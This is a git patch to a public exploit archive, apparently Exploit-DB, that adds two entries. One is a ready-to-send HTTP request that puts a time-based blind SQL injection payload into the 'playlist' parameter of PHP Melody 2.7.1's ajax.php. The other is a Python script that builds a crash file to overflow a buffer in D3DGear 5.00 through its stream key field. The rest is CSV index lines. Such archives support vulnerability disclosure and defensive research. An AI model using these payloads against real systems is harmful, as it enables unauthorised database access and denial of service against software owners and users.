From 07e51f4126f518780ad3ef8761cc1458e936dfb8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 1 Jan 2018 05:02:13 +0000 Subject: [PATCH] DB: 2018-01-01 2 changes to exploits/shellcodes D3DGear 5.00 Build 2175 - Buffer Overflow PHP Melody 2.7.1 - 'playlist' SQL Injection --- exploits/php/webapps/43409.txt | 22 ++++++++++++++++++++++ exploits/windows/dos/43410.py | 25 +++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 49 insertions(+) create mode 100644 exploits/php/webapps/43409.txt create mode 100755 exploits/windows/dos/43410.py diff --git a/exploits/php/webapps/43409.txt b/exploits/php/webapps/43409.txt new file mode 100644 index 000000000..379d3a951 --- /dev/null +++ b/exploits/php/webapps/43409.txt @@ -0,0 +1,22 @@ +# Exploit Title: PHP Melody v2.7.1 - SQL Injection +# Date: 30/12/2017 +# Exploit Author: Ahmad Mahfouz +# Contact: http://twitter.com/eln1x +# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html +# Version: 2.7.1 +# Tested on: Mac OS +# +# SQL Injection Type: time-based blind +# Parameter: playlist +# Page: ajax.php +# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi] + + + +GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1 +Host: localhost +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close \ No newline at end of file diff --git a/exploits/windows/dos/43410.py b/exploits/windows/dos/43410.py new file mode 100755 index 000000000..10f6b38db --- /dev/null +++ b/exploits/windows/dos/43410.py @@ -0,0 +1,25 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow +# Date: 07-11-2017 +# Vulnerable Software: D3DGear 5.00 Build 2175 +# Vendor Homepage: http://www.d3dgear.com/ +# Version: 5.00 Build 2175 +# Software Link: http://www.d3dgear.com/products.htm +# Tested On: Windows 7 x86 +# +# +# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key +# +# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer +# + +file = "crash.txt" + +buffer = "A"* 1284 + "B"*4 +writeFile = open (file, "w") +writeFile.write( buffer ) +writeFile.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 637bff09f..198a03d1d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5436,6 +5436,7 @@ id,file,description,date,author,type,platform,port 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware, 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows, 43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows, +43410,exploits/windows/dos/43410.py,"D3DGear 5.00 Build 2175 - Buffer Overflow",2017-12-31,bzyo,dos,windows, 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows, @@ -37679,6 +37680,7 @@ id,file,description,date,author,type,platform,port 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware, 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware, 43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx, +43409,exploits/php/webapps/43409.txt,"PHP Melody 2.7.1 - 'playlist' SQL Injection",2017-12-31,"Ahmad Mahfouz",webapps,php, 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php, 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware, 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,